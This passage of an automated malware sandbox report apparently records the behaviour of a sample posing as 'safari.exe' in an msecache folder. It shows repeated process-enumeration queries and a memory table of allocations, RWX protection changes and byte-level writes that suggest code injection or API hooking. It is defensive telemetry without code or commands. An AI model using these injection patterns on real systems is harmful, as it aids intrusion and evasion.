| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
8 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\program files\windowsapps\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\hxtsr.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 2 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Memory (156)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | c:\program files (x86)\msecache\safari.exe | address = 0x500000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 56 |
|
1 | |
| Allocate | c:\program files (x86)\msecache\safari.exe | address = 0x510000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Allocate | c:\program files (x86)\msecache\safari.exe | address = 0x700000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 56 |
|
1 | |
| Allocate | c:\program files (x86)\msecache\safari.exe | address = 0x710000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x510000, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
1 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x510000, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x500000, protection = PAGE_EXECUTE_READWRITE, size = 61 |
|
1 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b0, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
2 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x7782d9b0, protection = PAGE_EXECUTE_READ, size = 1024 |
|
2 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x710000, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
1 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x710000, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Protect | c:\program files (x86)\msecache\safari.exe | address = 0x700000, protection = PAGE_EXECUTE_READWRITE, size = 61 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x510000, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x510001, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x510002, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x510003, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x510004, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500000, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500001, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500002, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500003, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500004, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500005, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500006, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500007, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500008, size = 1 |
|
1 | |
| Write | c:\program files (x86)\msecache\safari.exe | address = 0x500009, size = 1 |
|
1 | |
